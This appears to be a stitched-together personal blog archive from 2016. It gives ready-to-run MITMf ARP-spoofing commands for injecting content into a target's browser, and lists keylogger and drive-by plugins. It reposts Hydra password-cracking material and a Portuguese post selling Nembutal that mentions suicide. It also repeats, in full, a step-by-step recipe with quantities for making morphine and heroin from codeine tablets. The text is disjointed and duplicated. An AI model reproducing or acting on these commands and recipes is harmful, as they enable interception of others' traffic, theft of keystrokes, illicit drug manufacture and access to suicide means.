Wednesday, October 26, 2016
Sunday, October 23, 2016
Man-In-The-Middle Attack Framework: MITMf
MITMf is a Framework for Man-In-The-Middle attacks. MITMf
aims to provide a one-stop-shop for Man-In-The-Middle and network
attacks while updating and improving existing attacks and techniques.Originally built to address the significant shortcomings of other tools (e.g
Ettercap, Mallory),
it's been almost completely re-written from scratch to provide a
modular and easily extendible framework that anyone can use to implement
their own MITM attack.MITMf is available with Kali Linux. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at https://github.com/byt3bl33d3r/MITMf/wiki/Installation MITMf is a simple to use command line attack tool. This
article presents some example which can be a real fun ;). Use it at your
own risk.Inject html page in victims browser
Create a index.html in your root folder and ...root@debian:~# cd /usr/share/mitmf/
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html
-iis for the interface (wlan0 in this example)--spoofLoads plugin 'Spoof'--arpRedirect traffic using ARP spoofing--gateway GATEWAYSpecify the gateway IP on your network.--targets TARGETSSpecify host/s to poison [if ommited will default to subnet]--injectLoad plugin 'Inject' to inject index.html
Note: arp spoof attack intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.
Make images look upside-down
This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet
Replace images (Image Randomiser)
Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (/root/Pictures/ in this example).root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/
Other Plugins
There are many other plugins available withMITMf you can play with.- To take a screenshot of victims browser
ScreenShotter:
Uses HTML5 Canvas to render an accurate screenshot of a clients browser
--screen Load plugin 'ScreenShotter'
--interval SECONDS Interval at which screenshots will be taken (default 10 seconds)
- Injects a javascript keylogger into victims webpages
--jskeylogger Load plugin 'JSKeylogger'
- Performs HTA drive-by attacks on victim
--hta Load plugin 'HTA Drive-By'
--text TEXT Text to display on notification bar
--hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/ Wednesday, October 19, 2016
lets go again for chemestry and explosives " sodium metal is not an oxidizer but it will react violently with water including the moisture in the air producing the highly flammable hydrogen gas. The oxidizer in this situation is the oxygen in the air. This chemical when stored should not be in contact with air or water." what's news then? for any person used to talk about bombs...is that sodium metal is a medication.
STORAGE: Store between 15 to 30°C (59 to 86°F). Contents under pressure. Do not puncture, incinerate, or place near sources of heat. Exposure to temperatures above 120°F may cause bursting. Keep out of the reach of children. Avoid spraying in eyes
INTAL® INHALER
(cromolyn sodium inhalation aerosol)
http://www.rxlist.com/intal-drug/medication-guide.htm
Friday, October 14, 2016
Jun.
9th,
2015
Using IP Spoofing to Simulate Requests from Different IP Addresses with JMeter
It’s not easy today to find a single node system as both failover
and resilience are key points of modern applications. So if you need to
load test a system, it will likely be something clustered.
The idea of a cluster is to protect the application from failure. If one node goes out of order, the remaining ones will continue to serve incoming requests. Usually hardware or software load balancers act as a single entry point, orchestrating all the incoming requests and sending them to the appropriate backend servers.
We have already covered the situation when the load balancer has more than one IP address and we know how to configure JMeter to hit all the load balancer endpoints. If it is something you missed you’re very welcome to read The DNS Cache Manager: The Right Way To Test Load Balanced Apps guide.
The idea of a cluster is to protect the application from failure. If one node goes out of order, the remaining ones will continue to serve incoming requests. Usually hardware or software load balancers act as a single entry point, orchestrating all the incoming requests and sending them to the appropriate backend servers.
We have already covered the situation when the load balancer has more than one IP address and we know how to configure JMeter to hit all the load balancer endpoints. If it is something you missed you’re very welcome to read The DNS Cache Manager: The Right Way To Test Load Balanced Apps guide.
The Challenge of Stickiness
One
of the main features of load balancers is “stickiness” or “persistence”
- a mechanism of wiring a client to one backend node behind the load
balancer so requests could go back and forth. For example, if the
application uses cookie-based authentication and the user has logged
into one of the backend nodes, he will be authenticated there only for
the amount of time required to replicate the session cache (which may be
not immediate). This is one reason for stickiness.
https://www.blazemeter.com/blog/using-ip-spoofing-simulate-requests-different-ip-addresses-jmeter
Thursday, October 13, 2016
Venda de Nembutal
O medicamento Nembutal não serve apenas para eutanásia (suicídio), atua também como um poderoso calmante barbitúrico, capaz de aliviar dores e até mesmo colocar uma pessoa para dormir por até 16 horas, isto mesmo, 16 horas ininterruptamente...
Wednesday, October 12, 2016
this is all about this HYDRA, which is basicly the NSA sks..but they have a different template and probably some more features added...but its pretty much this:
Hydra available for Linux,
Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, Currently supports AFP,
Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC,
LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3,
SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Change Log
New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
Added support for win8 and win2012 server to the RDP module
Better target distribution if -M is used
Added colored output (needs libcurses)
Better library detection for current Cygwin and OS X
Fixed the -W option
Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
Fixed HTTP Form module false positive when no answer was received from the server
Fixed SMB module return code for invalid hours logon and LM auth disabled
Fixed http-{get|post-form} from xhydra
Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
/*
* Initial main.c file generated by Glade. Edit as required.
* Glade will not overwrite this file.
*/
#ifdef HAVE_CONFIG_H
#include
#endif
#include
#include
#include "interface.h"
#include "support.h"
#include "callbacks.h"
char *hydra_path1 = "./hydra";
char *hydra_path2 = "/usr/local/bin/hydra";
char *hydra_path3 = "/usr/bin/hydra";
int main(int argc, char *argv[]) {
extern GtkWidget *wndMain;
int i;
extern guint message_id;
GtkWidget *output;
GtkTextBuffer *outputbuf;
gtk_set_locale();
gtk_init(&argc, &argv);
add_pixmap_directory(PACKAGE_DATA_DIR "/" PACKAGE "/pixmaps");
/* initialize the message id */
message_id = 0;
/* locate the hydra binary */
HYDRA_BIN = NULL;
for (i = 0; i < argc - 1; i++) {
if (!strcmp(argv[i], "--hydra-path")) {
HYDRA_BIN = argv[i + 1];
break;
}
}
if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) {
/* just for obfuscation *g* */
} else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path1;
} else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path2;
} else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path3;
} else {
g_error("Please tell me where hydra is, use --hydra-path\n");
return -1;
}
/* create window and show it */
wndMain = create_wndMain();
gtk_widget_show(wndMain);
/* if we cant use the new cool file chooser, the save button gets disabled */
#ifndef GTK_TYPE_FILE_CHOOSER
GtkWidget *btnSave;
btnSave = lookup_widget(GTK_WIDGET(wndMain), "btnSave");
gtk_widget_set_sensitive(btnSave, FALSE);
#endif
/* update the statusbar every now and then */
g_timeout_add(600, update_statusbar, NULL);
/* we want bold text in the output window */
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_create_tag(outputbuf, "bold", "weight", PANGO_WEIGHT_BOLD, NULL);
/* he ho, lets go! */
gtk_main();
return 0;
}
Change Log
New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
Added support for win8 and win2012 server to the RDP module
Better target distribution if -M is used
Added colored output (needs libcurses)
Better library detection for current Cygwin and OS X
Fixed the -W option
Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
Fixed HTTP Form module false positive when no answer was received from the server
Fixed SMB module return code for invalid hours logon and LM auth disabled
Fixed http-{get|post-form} from xhydra
Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
Added debug mode option to usage (thanks to Anold Black)
/*
* Initial main.c file generated by Glade. Edit as required.
* Glade will not overwrite this file.
*/
#ifdef HAVE_CONFIG_H
#include
#endif
#include
#include
#include "interface.h"
#include "support.h"
#include "callbacks.h"
char *hydra_path1 = "./hydra";
char *hydra_path2 = "/usr/local/bin/hydra";
char *hydra_path3 = "/usr/bin/hydra";
int main(int argc, char *argv[]) {
extern GtkWidget *wndMain;
int i;
extern guint message_id;
GtkWidget *output;
GtkTextBuffer *outputbuf;
gtk_set_locale();
gtk_init(&argc, &argv);
add_pixmap_directory(PACKAGE_DATA_DIR "/" PACKAGE "/pixmaps");
/* initialize the message id */
message_id = 0;
/* locate the hydra binary */
HYDRA_BIN = NULL;
for (i = 0; i < argc - 1; i++) {
if (!strcmp(argv[i], "--hydra-path")) {
HYDRA_BIN = argv[i + 1];
break;
}
}
if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) {
/* just for obfuscation *g* */
} else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path1;
} else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path2;
} else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path3;
} else {
g_error("Please tell me where hydra is, use --hydra-path\n");
return -1;
}
/* create window and show it */
wndMain = create_wndMain();
gtk_widget_show(wndMain);
/* if we cant use the new cool file chooser, the save button gets disabled */
#ifndef GTK_TYPE_FILE_CHOOSER
GtkWidget *btnSave;
btnSave = lookup_widget(GTK_WIDGET(wndMain), "btnSave");
gtk_widget_set_sensitive(btnSave, FALSE);
#endif
/* update the statusbar every now and then */
g_timeout_add(600, update_statusbar, NULL);
/* we want bold text in the output window */
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_create_tag(outputbuf, "bold", "weight", PANGO_WEIGHT_BOLD, NULL);
/* he ho, lets go! */
gtk_main();
return 0;
}
Tuesday, October 11, 2016
Transformation of natural uranium into uranium tetrafluoride
During the first phase, the uranium is transformed into uranium tetrafluoride (UF4).The concentrated ore is dissolved by acid, then purified to yield. After precipitation and calcination, uranium trioxide powder (UO3) is obtained, and is then hydrofluorated using hydrofluoric acid.
It is thus transformed into a green substance with a granular appearance called uranium tetrafluoride (UF4).
These operations are carried out in the COMURHEX-Malvési plant in Narbonne, France.
Transformation of uranium tetrafluoride into uranium hexafluoride
The UF4 is then converted in a second phase of fluorination into uranium hexafluoride (UF6), using fluorine obtained by electrolysis of hydrofluoric acid.The UF6 is made by contact of gaseous fluorine with the UF4 powder. The chemical reaction makes very high-temperature in a reactor with flames.
A last stage consists in transforming the obtained UF6 of the solid state to the gaseous state. Thus, it's possible to enrich it. These operations are carried out in the COMURHEX plant in Tricastin.
Monday, October 10, 2016
The Illicit Preparation of Morphine and Heroin from Pharmaceutical Products Containing Codeine:
1. Extraction of codeine
Several packets of tablets, sufficient to yield about 2 g of codeine, are crushed and mixed with water. The mixture is filtered using a filter pump, Buchner funnel and side-arm flask, to remove tablet binding agents, diluents and other excipients. The aqueous filtrate is poured into a separating funnel and sodium hydroxide solution added to make the solution strongly alkaline. This is then extracted with chloroform (about 50 ml). The chloroform layer is drained off and evaporated to dryness using gentle heating (often on a domestic stove). The aqueous layer containing aspirin and paracetamol is discarded. The codeine base is recovered as a white crystalline solid for use in Step 3.
2. Preparation of pyridine hydrochloride
In a beaker pyridine (20 ml) and concentrated hydrochloric acid (25 ml) are strongly heated (to about 190°C) to drive off water. The product is cooled rapidly to form a waxy white solid which is stored in a sealed container in a freezer to minimise exposure to moisture and avoid decomposition.
3. Reaction of codeine and pyridine hydrochloride
The reaction is carried out using a boiling tube which is flame-dried before use. Pyridine hydrochloride (3.5 g) as prepared in Step 2 is then heated in the tube until it melts and any residual moisture is driven off. Any resulting condensation on the inside walls of the tube is wiped off. Codeine base (1.5 g) is added to the tube which is then stoppered with a rubber bung covered with filter paper and heated until the mixture starts to fume. Heating is continued until a reddish-orange colour develops in the reaction melt, which becomes noticeably more viscous (6-12 min). The contents of the boiling tube are then poured into a 500 ml separating funnel and the volume made up to 100 ml with water. Sodium hydroxide solution (10%) is added until the contents of the separating funnel are strongly basic. As the sodium hydroxide is added the contents turn milky-brown before becoming clear brown again. Chloroform (20 ml) is added. After extraction the greyish-brown chloroform layer is either discarded or put aside for later recovery of the codeine contained in it. The aqueous layer is poured into a 400 ml beaker and the pH is carefully adjusted to pH 9 using hydrochloric acid and narrow-range indicator paper. The solution is rapidly filtered under suction, using a Buchner funnel and 2 filter papers, to remove a fine, dark brown residue containing unwanted by-products. The filtered solution is then poured into a clean beaker and precipitation is induced by vigorously rubbing the side of the beaker with a 'seeding stick' as the pH is carefully lowered to 8.5 with additional hydrochloric acid. (In homebake laboratories a split wooden clothes peg is often used as the 'seeding stick'.) The product is allowed to settle for at least 5 min before being filtered off under vacuum. The morphine product is recovered as a powder, ranging in colour from beige to dark brown.
4. Conversion of morphine to heroin
Morphine powder as prepared in Step 3 is placed in a spoon. A small amount of acetic anhydride is added and the mixture ignited. Addition of acetic anhydride may be repeated. A brown or black tar-like residue remains.
https://www.erowid.org/archive/rhodium/chemistry/codeine.homebake.labs.html
Several packets of tablets, sufficient to yield about 2 g of codeine, are crushed and mixed with water. The mixture is filtered using a filter pump, Buchner funnel and side-arm flask, to remove tablet binding agents, diluents and other excipients. The aqueous filtrate is poured into a separating funnel and sodium hydroxide solution added to make the solution strongly alkaline. This is then extracted with chloroform (about 50 ml). The chloroform layer is drained off and evaporated to dryness using gentle heating (often on a domestic stove). The aqueous layer containing aspirin and paracetamol is discarded. The codeine base is recovered as a white crystalline solid for use in Step 3.
2. Preparation of pyridine hydrochloride
In a beaker pyridine (20 ml) and concentrated hydrochloric acid (25 ml) are strongly heated (to about 190°C) to drive off water. The product is cooled rapidly to form a waxy white solid which is stored in a sealed container in a freezer to minimise exposure to moisture and avoid decomposition.
3. Reaction of codeine and pyridine hydrochloride
The reaction is carried out using a boiling tube which is flame-dried before use. Pyridine hydrochloride (3.5 g) as prepared in Step 2 is then heated in the tube until it melts and any residual moisture is driven off. Any resulting condensation on the inside walls of the tube is wiped off. Codeine base (1.5 g) is added to the tube which is then stoppered with a rubber bung covered with filter paper and heated until the mixture starts to fume. Heating is continued until a reddish-orange colour develops in the reaction melt, which becomes noticeably more viscous (6-12 min). The contents of the boiling tube are then poured into a 500 ml separating funnel and the volume made up to 100 ml with water. Sodium hydroxide solution (10%) is added until the contents of the separating funnel are strongly basic. As the sodium hydroxide is added the contents turn milky-brown before becoming clear brown again. Chloroform (20 ml) is added. After extraction the greyish-brown chloroform layer is either discarded or put aside for later recovery of the codeine contained in it. The aqueous layer is poured into a 400 ml beaker and the pH is carefully adjusted to pH 9 using hydrochloric acid and narrow-range indicator paper. The solution is rapidly filtered under suction, using a Buchner funnel and 2 filter papers, to remove a fine, dark brown residue containing unwanted by-products. The filtered solution is then poured into a clean beaker and precipitation is induced by vigorously rubbing the side of the beaker with a 'seeding stick' as the pH is carefully lowered to 8.5 with additional hydrochloric acid. (In homebake laboratories a split wooden clothes peg is often used as the 'seeding stick'.) The product is allowed to settle for at least 5 min before being filtered off under vacuum. The morphine product is recovered as a powder, ranging in colour from beige to dark brown.
4. Conversion of morphine to heroin
Morphine powder as prepared in Step 3 is placed in a spoon. A small amount of acetic anhydride is added and the mixture ignited. Addition of acetic anhydride may be repeated. A brown or black tar-like residue remains.
https://www.erowid.org/archive/rhodium/chemistry/codeine.homebake.labs.html
Subscribe to:
Posts (Atom)
Portugal Ukraine Russia (mercenaires killed)
https://sicnoticias.pt/especiais/guerra-russia-ucrania/2025-04-03-video-russia-diz-ter-abatido-mercenarios-portugueses-na-ucrania-755f2fec
